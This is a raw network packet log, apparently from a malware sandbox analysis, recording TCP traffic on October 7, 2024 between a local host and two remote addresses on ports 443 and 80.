                                                                                                                                      Oct 7, 2024 03:23:18.888792038 CEST4434988213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.888803959 CEST4434988213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.891644001 CEST49888443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.891661882 CEST4434988813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.891735077 CEST49888443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.891880989 CEST49888443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.891892910 CEST4434988813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.929019928 CEST4434988413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.930366039 CEST4434988413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.930411100 CEST4434988413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.930428982 CEST49884443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.930468082 CEST49884443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.930506945 CEST49884443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.930535078 CEST4434988413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.930558920 CEST49884443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.930572033 CEST4434988413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.933171034 CEST49889443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.933228016 CEST4434988913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.933316946 CEST49889443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.933450937 CEST49889443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.933479071 CEST4434988913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.946932077 CEST4434988313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.947237968 CEST4434988513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.947381973 CEST4434988513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.947451115 CEST49885443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.947645903 CEST4434988313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.948677063 CEST49883443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.948841095 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.948863983 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.948873997 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.948883057 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.948894024 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.948911905 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.948941946 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.949126959 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949137926 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949148893 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949158907 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949177980 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.949202061 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.949280024 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949291945 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949302912 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949314117 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949316025 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.949337006 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.949358940 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.949379921 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949389935 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949399948 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949410915 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949415922 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.949421883 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949424028 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.949443102 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.949464083 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.949851036 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949862003 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949872017 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.949894905 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.949906111 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.949979067 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950018883 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950028896 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950057030 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.950067043 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.950078011 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950088978 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950115919 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.950289011 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950330973 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.950340986 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950352907 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950387001 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.950412989 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950423002 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950433016 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950443029 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950454950 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950458050 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.950472116 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.950494051 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.950906038 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950917006 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950948954 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.950968981 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950970888 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.950978994 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.950989008 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951004028 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.951014042 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.951030016 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.951031923 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951042891 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951066971 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.951088905 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.951590061 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951598883 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951608896 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951620102 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951632023 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951639891 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.951642036 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951653957 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951663971 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951669931 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.951674938 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951677084 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.951689959 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951702118 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951711893 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951713085 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.951725006 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.951731920 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.951738119 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.951766968 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.952296019 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.952306032 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.952315092 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.952337980 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.952347994 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.952353954 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.952364922 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.952374935 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.952385902 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.952399969 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.952429056 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.952451944 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.952462912 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.952474117 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.952485085 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.952491045 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.952497959 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.952510118 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.952512980 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.952538013 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.952550888 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.953164101 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.953207970 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.953210115 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.953222036 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.953247070 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.953257084 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.953275919 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.953286886 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.953303099 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.953313112 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.953315020 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.953325033 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.953331947 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.953337908 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.953351021 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.953355074 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.953365088 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.953375101 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.953377008 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.953388929 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.953416109 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:18.992789030 CEST49885443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.992814064 CEST4434988513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.992839098 CEST49885443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.992854118 CEST4434988513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.994390965 CEST49883443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.994390965 CEST49883443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.994435072 CEST4434988313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.994457960 CEST4434988313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.997944117 CEST49890443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.997972965 CEST4434989013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.998086929 CEST49890443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.998231888 CEST49891443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.998271942 CEST4434989113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.998383045 CEST49891443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.998490095 CEST49890443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.998517036 CEST4434989013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.998545885 CEST49891443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:18.998564005 CEST4434989113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037372112 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037383080 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037394047 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037456989 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.037473917 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037478924 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.037487030 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037509918 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037513018 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.037522078 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037537098 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.037543058 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.037564039 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.037564993 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037575960 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037611008 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.037614107 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037651062 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.037695885 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037708044 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037725925 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037749052 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.037776947 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.037805080 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037859917 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.037872076 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037883043 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037894964 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.037910938 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.037921906 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.037941933 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078145981 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078174114 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078185081 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078197002 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078203917 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078219891 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078229904 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078263998 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078274012 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078284025 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078294039 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078305960 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078329086 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078488111 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078504086 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078515053 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078526020 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078530073 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078536987 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078536987 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078548908 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078558922 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078568935 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078577042 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078579903 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078591108 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078598022 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078608036 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078629971 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078790903 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078802109 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078820944 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078831911 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078843117 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078850985 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078871012 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078897953 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.078918934 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.078996897 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079008102 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079034090 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079042912 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079086065 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079097033 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079108000 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079118967 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079123020 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079130888 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079145908 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079155922 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079173088 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079185009 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079195023 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079217911 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079241991 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079354048 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079374075 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079394102 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079430103 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079479933 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079490900 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079502106 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079511881 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079518080 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079519987 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079541922 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079550028 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079621077 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079689980 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079699993 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079729080 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079760075 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079775095 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079786062 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079797983 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079807997 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079824924 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079839945 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079919100 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079931974 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079941988 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079968929 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079982042 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.079992056 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.079993010 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.080003977 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.080015898 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.080022097 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.080035925 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.080041885 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.080060959 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.080077887 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.080089092 CEST8049879185.215.113.103192.168.2.4
